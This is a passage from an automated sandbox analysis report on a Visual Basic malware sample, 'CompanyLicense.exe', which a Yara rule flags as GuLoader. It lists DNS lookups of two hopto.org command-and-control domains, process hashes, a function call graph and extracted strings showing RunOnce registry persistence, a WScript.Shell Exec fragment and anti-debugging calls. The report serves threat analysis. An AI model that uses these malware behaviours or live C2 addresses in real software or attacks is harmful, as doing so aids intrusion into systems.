                                    Jan 19, 2021 17:16:14.361051083 CET53519328.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:16.555202007 CET5949453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:16.616471052 CET53594948.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:17.819614887 CET5591553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:17.876086950 CET53559158.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:20.080435991 CET4977953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:20.139585972 CET53497798.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:21.342369080 CET4945853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:21.393071890 CET53494588.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:23.585649014 CET5716453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:23.644537926 CET53571648.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:24.839747906 CET4984053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:24.896742105 CET53498408.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:27.103224039 CET5717453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:27.159734011 CET53571748.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:28.373641968 CET5853153192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:28.430135965 CET53585318.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:30.653420925 CET4960853192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:30.709765911 CET53496088.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:31.925923109 CET5568253192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:31.985290051 CET53556828.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:34.204695940 CET6243653192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:34.265736103 CET53624368.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:35.472865105 CET6123053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:35.537314892 CET53612308.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:37.777757883 CET6473053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:37.836141109 CET53647308.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:39.052273989 CET6062453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:39.112523079 CET53606248.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:41.310803890 CET6260053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:41.369627953 CET53626008.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:42.581015110 CET5320053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:42.639022112 CET53532008.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:44.838633060 CET6103453192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:44.897322893 CET53610348.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:46.098861933 CET5768753192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:46.155225992 CET53576878.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:48.340233088 CET4983953192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:48.404742956 CET53498398.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:49.565933943 CET5797553192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:49.622330904 CET53579758.8.8.8192.168.2.4
                                    Jan 19, 2021 17:16:51.772027969 CET5761053192.168.2.48.8.8.8
                                    Jan 19, 2021 17:16:51.819967985 CET53576108.8.8.8192.168.2.4

                                    DNS Queries


                                    DNS Answers

                                    Jan 19, 2021 17:15:07.610485077 CET8.8.8.8192.168.2.40xf2c9No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:09.849160910 CET8.8.8.8192.168.2.40xbe01No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:11.093702078 CET8.8.8.8192.168.2.40x113cNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:13.343240023 CET8.8.8.8192.168.2.40xe41cNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:14.597177029 CET8.8.8.8192.168.2.40xeec6No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:28.815994978 CET8.8.8.8192.168.2.40xfbfdNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:30.076164007 CET8.8.8.8192.168.2.40x969eNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:32.326874018 CET8.8.8.8192.168.2.40x3f0eNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:33.564708948 CET8.8.8.8192.168.2.40x7ae3No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:35.809885979 CET8.8.8.8192.168.2.40xf04bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:37.073565960 CET8.8.8.8192.168.2.40x7653No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:39.317043066 CET8.8.8.8192.168.2.40xac4bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:40.546051025 CET8.8.8.8192.168.2.40x9466No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:42.791768074 CET8.8.8.8192.168.2.40x1882No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:44.036858082 CET8.8.8.8192.168.2.40xb347No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:46.287039042 CET8.8.8.8192.168.2.40xdde8No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:47.547096968 CET8.8.8.8192.168.2.40xda2No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:50.533364058 CET8.8.8.8192.168.2.40xa29bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:51.789258957 CET8.8.8.8192.168.2.40x673bNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:15:54.061994076 CET8.8.8.8192.168.2.40x17feNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:07.266206980 CET8.8.8.8192.168.2.40x90f4No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:09.529237032 CET8.8.8.8192.168.2.40x6360No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:10.823873997 CET8.8.8.8192.168.2.40x696cNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:13.114248037 CET8.8.8.8192.168.2.40x4581No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:14.361051083 CET8.8.8.8192.168.2.40x2031No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:16.616471052 CET8.8.8.8192.168.2.40x7900No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:17.876086950 CET8.8.8.8192.168.2.40x1e2eNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:20.139585972 CET8.8.8.8192.168.2.40xd577No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:21.393071890 CET8.8.8.8192.168.2.40x4789No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:23.644537926 CET8.8.8.8192.168.2.40x3d2aNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:24.896742105 CET8.8.8.8192.168.2.40x94adNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:27.159734011 CET8.8.8.8192.168.2.40x4bbaNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:28.430135965 CET8.8.8.8192.168.2.40xdffdNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:30.709765911 CET8.8.8.8192.168.2.40xcaedNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:31.985290051 CET8.8.8.8192.168.2.40xf3c1No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:34.265736103 CET8.8.8.8192.168.2.40x910bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:35.537314892 CET8.8.8.8192.168.2.40x59d9No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:37.836141109 CET8.8.8.8192.168.2.40x9222No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:39.112523079 CET8.8.8.8192.168.2.40x6cabNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:41.369627953 CET8.8.8.8192.168.2.40x2b6bNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:42.639022112 CET8.8.8.8192.168.2.40xa7bbNo error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:44.897322893 CET8.8.8.8192.168.2.40xed0eNo error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:46.155225992 CET8.8.8.8192.168.2.40x3328No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:48.404742956 CET8.8.8.8192.168.2.40x11f3No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:49.622330904 CET8.8.8.8192.168.2.40xace5No error (0)sheilabeltagy3m.hopto.org185.140.53.253A (IP address)IN (0x0001)
                                    Jan 19, 2021 17:16:51.819967985 CET8.8.8.8192.168.2.40xf495No error (0)northside.hopto.org185.140.53.253A (IP address)IN (0x0001)

                                    Code Manipulations

                                    Statistics

                                    CPU Usage


                                    Memory Usage


                                    High Level Behavior Distribution


                                    Behavior


                                    System Behavior

                                    General

                                    Start time: 17:14:06
                                    Start date: 19/01/2021
                                    Path: C:\Users\user\Desktop\CompanyLicense.exe
                                    Wow64 process (32bit): true
                                    Commandline: 'C:\Users\user\Desktop\CompanyLicense.exe'
                                    Imagebase: 0x400000
                                    File size: 98304 bytes
                                    MD5 hash: ACE3E9FC3A2277AA4E72881C9F204642
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: Visual Basic
                                    Reputation: low

                                    General

                                    Start time: 17:14:13
                                    Start date: 19/01/2021
                                    Path: C:\Users\user\Desktop\CompanyLicense.exe
                                    Wow64 process (32bit): true
                                    Commandline: 'C:\Users\user\Desktop\CompanyLicense.exe'
                                    Imagebase: 0x400000
                                    File size: 98304 bytes
                                    MD5 hash: ACE3E9FC3A2277AA4E72881C9F204642
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation: low

                                    Disassembly

                                    Code Analysis


                                      Execution Graph

                                      Execution Coverage: 15.6%
                                      Dynamic/Decrypted Code Coverage: 66.5%
                                      Signature Coverage: 23.4%
                                      Total number of Nodes: 1060
                                      Total number of Limit Nodes: 97

                                      Graph

4507->4508 4510 40ef3f 4508->4510 4511 40ef50 __vbaHresultCheckObj 4510->4511 4512 40ef73 4510->4512 4513 40ef7a __vbaLateIdCallLd 4511->4513 4512->4513 4514 40efb7 __vbaObjSet 4513->4514 4515 40ef9c __vbaNew2 4513->4515 4517 40f005 4514->4517 4515->4514 4518 40f016 __vbaHresultCheckObj 4517->4518 4519 40f039 4517->4519 4518->4519 4520 40f064 __vbaObjSet 4519->4520 4521 40f049 __vbaNew2 4519->4521 4523 40f0b5 4520->4523 4521->4520 4524 40f0c6 __vbaHresultCheckObj 4523->4524 4525 40f0e9 4523->4525 4526 40f0f0 __vbaStrMove __vbaI4Var __vbaI4Var __vbaChkstk 4524->4526 4525->4526 4527 40f1d4 4526->4527 4528 40f203 4527->4528 4529 40f1e3 __vbaHresultCheckObj 4527->4529 4530 40f20a __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4528->4530 4529->4530 4531 40f294 __vbaObjSet 4530->4531 4532 40f279 __vbaNew2 4530->4532 4534 40f2df 4531->4534 4532->4531 4535 40f310 4534->4535 4536 40f2f0 __vbaHresultCheckObj 4534->4536 4537 40f320 __vbaNew2 4535->4537 4538 40f33b __vbaObjSet 4535->4538 4536->4535 4537->4538 4540 40f389 4538->4540 4541 40f3ba 4540->4541 4542 40f39a __vbaHresultCheckObj 4540->4542 4543 40f3e5 __vbaObjSet 4541->4543 4544 40f3ca __vbaNew2 4541->4544 4542->4541 4546 40f436 4543->4546 4544->4543 4547 40f447 __vbaHresultCheckObj 4546->4547 4548 40f46a 4546->4548 4547->4548 4549 40f495 __vbaObjSet 4548->4549 4550 40f47a __vbaNew2 4548->4550 4552 40f4e6 4549->4552 4550->4549 4553 40f4f7 __vbaHresultCheckObj 4552->4553 4554 40f51a 4552->4554 4555 40f521 __vbaLateIdCallLd 4553->4555 4554->4555 4556 40f543 __vbaNew2 4555->4556 4557 40f55e __vbaObjSet 4555->4557 4556->4557 4559 40f5af 4557->4559 4560 40f5c0 __vbaHresultCheckObj 4559->4560 4561 40f5e3 4559->4561 4560->4561 4562 40f5f3 __vbaNew2 4561->4562 4563 40f60e __vbaObjSet 4561->4563 4562->4563 4565 40f65f 4563->4565 4566 40f670 __vbaHresultCheckObj 4565->4566 4567 40f693 4565->4567 4568 40f69a __vbaStrVarMove __vbaStrMove __vbaChkstk 4566->4568 4567->4568 4569 40f755 4568->4569 4570 40f784 4569->4570 4571 40f764 
__vbaHresultCheckObj 4569->4571 4572 40f78b __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4570->4572 4571->4572 4573 40f811 4572->4573 4574 40f840 4573->4574 4575 40f820 __vbaHresultCheckObj 4573->4575 4576 40f860 __vbaNew2 4574->4576 4577 40f87b __vbaObjSet 4574->4577 4575->4574 4576->4577 4579 40f8c9 4577->4579 4580 40f8da __vbaHresultCheckObj 4579->4580 4581 40f8fd 4579->4581 4580->4581 4582 40f928 __vbaObjSet 4581->4582 4583 40f90d __vbaNew2 4581->4583 4585 40f979 4582->4585 4583->4582 4586 40f98a __vbaHresultCheckObj 4585->4586 4587 40f9ad 4585->4587 4586->4587 4588 40f9d8 __vbaObjSet 4587->4588 4589 40f9bd __vbaNew2 4587->4589 4591 40fa23 4588->4591 4589->4588 4592 40fa54 4591->4592 4593 40fa34 __vbaHresultCheckObj 4591->4593 4594 40fa5b __vbaChkstk 4592->4594 4593->4594 4595 40fabb 4594->4595 4596 40faea 4595->4596 4597 40faca __vbaHresultCheckObj 4595->4597 4598 40faf1 __vbaFreeObjList __vbaFreeVar 4596->4598 4597->4598 4599 40fb43 __vbaObjSet 4598->4599 4600 40fb28 __vbaNew2 4598->4600 4602 40fb91 4599->4602 4600->4599 4603 40fba2 __vbaHresultCheckObj 4602->4603 4604 40fbc5 4602->4604 4603->4604 4605 40fbf0 __vbaObjSet 4604->4605 4606 40fbd5 __vbaNew2 4604->4606 4608 40fc3b 4605->4608 4606->4605 4609 40fc6c 4608->4609 4610 40fc4c __vbaHresultCheckObj 4608->4610 4611 40fc97 __vbaObjSet 4609->4611 4612 40fc7c __vbaNew2 4609->4612 4610->4609 4614 40fce5 4611->4614 4612->4611 4615 40fd16 4614->4615 4616 40fcf6 __vbaHresultCheckObj 4614->4616 4617 40fd41 __vbaObjSet 4615->4617 4618 40fd26 __vbaNew2 4615->4618 4616->4615 4620 40fd92 4617->4620 4618->4617 4621 40fda3 __vbaHresultCheckObj 4620->4621 4622 40fdc6 4620->4622 4621->4622 4623 40fdf1 __vbaObjSet 4622->4623 4624 40fdd6 __vbaNew2 4622->4624 4626 40fe3f 4623->4626 4624->4623 4627 40fe50 __vbaHresultCheckObj 4626->4627 4628 40fe73 4626->4628 4629 40fe7a __vbaChkstk 4627->4629 4628->4629 4630 40ff38 4629->4630 4631 40ff67 4630->4631 4632 40ff47 __vbaHresultCheckObj 4630->4632 4633 40ff6e __vbaVarMove 
__vbaFreeStr __vbaFreeObjList __vbaFreeVarList __vbaStrCopy 4631->4633 4632->4633 4634 410002 __vbaFreeStr 4633->4634 4635 410023 __vbaNew2 4634->4635 4636 41003e __vbaObjSet 4634->4636 4635->4636 4638 41008c 4636->4638 4639 4100c0 4638->4639 4640 41009d __vbaHresultCheckObj 4638->4640 4641 4100c7 __vbaLateIdCallLd 4639->4641 4640->4641 4642 410104 __vbaObjSet 4641->4642 4643 4100e9 __vbaNew2 4641->4643 4645 410155 4642->4645 4643->4642 4646 410166 __vbaHresultCheckObj 4645->4646 4647 410189 4645->4647 4646->4647 4648 4101b4 __vbaObjSet 4647->4648 4649 410199 __vbaNew2 4647->4649 4651 410205 4648->4651 4649->4648 4652 410216 __vbaHresultCheckObj 4651->4652 4653 410239 4651->4653 4652->4653 4654 410264 __vbaObjSet 4653->4654 4655 410249 __vbaNew2 4653->4655 4657 4102b2 4654->4657 4655->4654 4658 4102e3 4657->4658 4659 4102c3 __vbaHresultCheckObj 4657->4659 4660 4102f3 __vbaNew2 4658->4660 4661 41030e __vbaObjSet 4658->4661 4659->4658 4660->4661 4663 41035f 4661->4663 4664 410370 __vbaHresultCheckObj 4663->4664 4665 410393 4663->4665 4666 41039a __vbaLateIdCallLd 4664->4666 4665->4666 4667 4103d7 __vbaObjSet 4666->4667 4668 4103bc __vbaNew2 4666->4668 4670 410428 4667->4670 4668->4667 4671 410439 __vbaHresultCheckObj 4670->4671 4672 41045c 4670->4672 4673 410463 __vbaStrCopy __vbaI4Var __vbaI4Var 4671->4673 4672->4673 4674 4104f7 __vbaVarMove __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4673->4674 4675 410574 __vbaNew2 4674->4675 4676 41058f __vbaObjSet 4674->4676 4675->4676 4678 4105dd 4676->4678 4679 410611 4678->4679 4680 4105ee __vbaHresultCheckObj 4678->4680 4681 410621 __vbaNew2 4679->4681 4682 41063c __vbaObjSet 4679->4682 4680->4679 4681->4682 4684 41068d 4682->4684 4685 4106c1 4684->4685 4686 41069e __vbaHresultCheckObj 4684->4686 4687 4106d1 __vbaNew2 4685->4687 4688 4106ec __vbaObjSet 4685->4688 4686->4685 4687->4688 4690 41073a 4688->4690 4691 41076b 4690->4691 4692 41074b __vbaHresultCheckObj 4690->4692 4693 410772 __vbaChkstk __vbaChkstk __vbaChkstk 
4691->4693 4692->4693 4694 410874 4693->4694 4695 4108a3 4694->4695 4696 410883 __vbaHresultCheckObj 4694->4696 4697 4108aa __vbaFreeObjList __vbaFreeVar 4695->4697 4696->4697 4698 4108f3 __vbaNew2 4697->4698 4699 41090e __vbaObjSet 4697->4699 4698->4699 4701 41095c 4699->4701 4702 410990 4701->4702 4703 41096d __vbaHresultCheckObj 4701->4703 4704 4109a0 __vbaNew2 4702->4704 4705 4109bb __vbaObjSet 4702->4705 4703->4702 4704->4705 4707 410a0c 4705->4707 4708 410a40 4707->4708 4709 410a1d __vbaHresultCheckObj 4707->4709 4710 410add 4708->4710 4711 410abd __vbaHresultCheckObj 4708->4711 4709->4708 4712 410ae4 __vbaFreeObjList __vbaFreeVar 4710->4712 4711->4712 4713 410b3a __vbaObjSet 4712->4713 4714 410b1f __vbaNew2 4712->4714 4716 410b85 4713->4716 4714->4713 4717 410bb6 4716->4717 4718 410b96 __vbaHresultCheckObj 4716->4718 4719 410be1 __vbaObjSet 4717->4719 4720 410bc6 __vbaNew2 4717->4720 4718->4717 4722 410c2f 4719->4722 4720->4719 4723 410c60 4722->4723 4724 410c40 __vbaHresultCheckObj 4722->4724 4725 410c67 __vbaStrCopy 4723->4725 4724->4725 4726 410ccd 4725->4726 4727 410cfc 4726->4727 4728 410cdc __vbaHresultCheckObj 4726->4728 4729 410d03 __vbaFreeStr __vbaFreeObjList __vbaOnError 4727->4729 4728->4729 4730 410d43 4729->4730 4731 410d54 __vbaHresultCheckObj 4730->4731 4732 410d74 4730->4732 4731->4732 4738 411bbe __vbaChkstk #644 4732->4738 4734 410da6 4739 4041a1 4734->4739 4738->4734 4740 404238 4739->4740 4740->4740 4741 40424a VirtualAlloc 4740->4741 4742 404383 4741->4742 5398 20a8fe0 5400 20a8ecb 5398->5400 5399 20a7c59 GetPEB 5401 20a90eb 5399->5401 5400->5399 5402 20a95a7 5401->5402 5403 20a958c OpenSCManagerA 5401->5403 5404 20a959b 5403->5404 5404->5404 4919 20a2c7b 4920 20a2c10 GetPEB 4919->4920 4929 20a2c76 4919->4929 4922 20a8ec1 2 API calls 4920->4922 4923 20a2c5f 4922->4923 4924 20a2c64 4923->4924 4927 20a2bf2 4923->4927 4925 20a8ec1 2 API calls 4924->4925 4925->4929 4926 20a2d8f GetPEB 4932 20a3e20 4926->4932 4928 20a2c10 3 API calls 
4927->4928 4931 20a9702 4928->4931 4929->4926 4930 20a7c59 GetPEB 4930->4932 4932->4930 5053 20a62f8 5054 20a6303 GetLongPathNameW 5053->5054 5055 20a6294 5053->5055 5056 20a6514 5054->5056 4377 20a457e 4378 20a5075 4377->4378 4379 20a507c LdrInitializeThunk 4378->4379 4380 20a50e5 4378->4380 4381 20a837e 4382 20a6f5a 4381->4382 4383 20a8485 4381->4383 4384 20a70a8 LoadLibraryA 4382->4384 4387 20a7679 GetPEB 4382->4387 4408 20a8b16 NtProtectVirtualMemory 4383->4408 4386 20a70b3 4384->4386 4389 20a706a 4387->4389 4388 20a3cc1 4391 20a709b 4389->4391 4392 20a08f9 4389->4392 4393 20a7086 4389->4393 4390 20a84c3 4390->4388 4398 20a8832 4390->4398 4407 20a865d 4390->4407 4391->4384 4394 20a08d5 15 API calls 4392->4394 4395 20a7679 GetPEB 4393->4395 4396 20a08fe 4394->4396 4397 20a708c 4395->4397 4397->4391 4399 20a7679 GetPEB 4397->4399 4402 20a89a5 4398->4402 4403 20a8858 4398->4403 4399->4391 4401 20a8a03 4411 20a8b16 NtProtectVirtualMemory 4402->4411 4410 20a8b16 NtProtectVirtualMemory 4403->4410 4406 20a899f 4407->4388 4409 20a8b16 NtProtectVirtualMemory 4407->4409 4408->4390 4409->4388 4410->4406 4411->4401 4933 20a247e 4934 20a2418 4933->4934 4935 20a8ec1 2 API calls 4934->4935 4942 20a25b7 4934->4942 4935->4934 4936 20a291f GetPEB 4937 20a2940 4936->4937 4938 20a2ae1 4937->4938 4940 20a8ec1 2 API calls 4937->4940 4943 20a2aba 4937->4943 4939 20a2c10 3 API calls 4938->4939 4941 20a9702 4939->4941 4940->4937 4942->4936 4944 20a8ec1 2 API calls 4943->4944 4944->4938 5057 4116b5 __vbaChkstk 5058 411703 __vbaObjSet 5057->5058 5059 4116eb __vbaNew2 5057->5059 5061 411738 5058->5061 5059->5058 5062 411743 __vbaHresultCheckObj 5061->5062 5063 41175d 5061->5063 5064 411761 __vbaFreeObj 5062->5064 5063->5064 5065 41177a 5064->5065 5405 20a41fe 5406 20a41fa 5405->5406 5407 20a7679 GetPEB 5406->5407 5408 20a8078 5407->5408 4945 411437 __vbaChkstk 4946 411477 #536 __vbaStrMove __vbaFreeVar 4945->4946 4947 4114b0 __vbaFreeStr 4946->4947 5066 20a2af2 5067 20a2bf0 5066->5067 
5068 20a2c10 3 API calls 5067->5068 5069 20a9702 5068->5069 5266 20a7d70 5267 20a6f5a 15 API calls 5266->5267 5268 20a7d84 5267->5268 5269 20a7679 GetPEB 5268->5269 5270 20a3cc1 5268->5270 5269->5270

                                      Executed Functions

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: j@h$]:$iX
                                      • API String ID: 0-588690634
                                      • Opcode ID: 7165bc645bb0a4d0e1ca5414f510100a26532113cb44905fc3d6fe2a4159e8da
                                      • Instruction ID: 34ab61d7eb186fa65bc218d9d7122b8d205d331cbd6f979bffc56c7b00212959
                                      • Opcode Fuzzy Hash: 7165bc645bb0a4d0e1ca5414f510100a26532113cb44905fc3d6fe2a4159e8da
                                      • Instruction Fuzzy Hash: 2002BA709003466BEB321BF4CCA5BD8B777AF41314FD44268FE86571D1C7B9A8A0AB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Strings
                                      • W = CreateObject("WScript.Shell")Set C = W.Exec (", xrefs: 020A5381
                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 020A53C6
                                      • \Internering2.exe, xrefs: 020A5406
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$W = CreateObject("WScript.Shell")Set C = W.Exec ("$\Internering2.exe
                                      • API String ID: 1029625771-867964101
                                      • Opcode ID: e05aab62bb3be44cf28252791593768de983d64d62cfd7530dda196b8a1eefed
                                      • Instruction ID: 90720e8a392e3bd954aa173c2c9f10ad8d9060fbbab9555233c238446cf64ad9
                                      • Opcode Fuzzy Hash: e05aab62bb3be44cf28252791593768de983d64d62cfd7530dda196b8a1eefed
                                      • Instruction Fuzzy Hash: 05F1F030D043864BDB3216F44CB57DCBBB77F42324FD842AAEC99471A2D7A598A0D752
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: j@h$]:$iX
                                      • API String ID: 0-588690634
                                      • Opcode ID: 148dd63ea7f608c0aa791e72579de84f4c6a8184696d79aa1afc4aff52aec32d
                                      • Instruction ID: 6f0f67b97e4557df1bd68ba69dfcb07f79b144ed54e85531d051caa1be51fa8d
                                      • Opcode Fuzzy Hash: 148dd63ea7f608c0aa791e72579de84f4c6a8184696d79aa1afc4aff52aec32d
                                      • Instruction Fuzzy Hash: 9F81897090468A6BEB220BB0CC957C4FB76BF01714F8411A8FE96471A1C7B66CF49BC1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • EnumWindows.USER32(020A08FE,?,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?), ref: 020A08E7
                                      • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A0A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: EnumInformationThreadWindows
                                      • String ID: 1.!T$Msi.dll
                                      • API String ID: 1954852945-1822015534
                                      • Opcode ID: f9c80b3dfd7aa95962c71d2c78de894e7ac0f912cb6256bc9ba11a4e262a0758
                                      • Instruction ID: 52d240596efc28cac5f5758ee0e32af238a5303dae35d7b8882b38d9db75075f
                                      • Opcode Fuzzy Hash: f9c80b3dfd7aa95962c71d2c78de894e7ac0f912cb6256bc9ba11a4e262a0758
                                      • Instruction Fuzzy Hash: 9E310874740309ABEB109FA48DF0BDE3AA3AF85354FA48229FD596B2C4CA70DC45D711
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A0A7A
                                      Strings
                                      Memory Dump Source
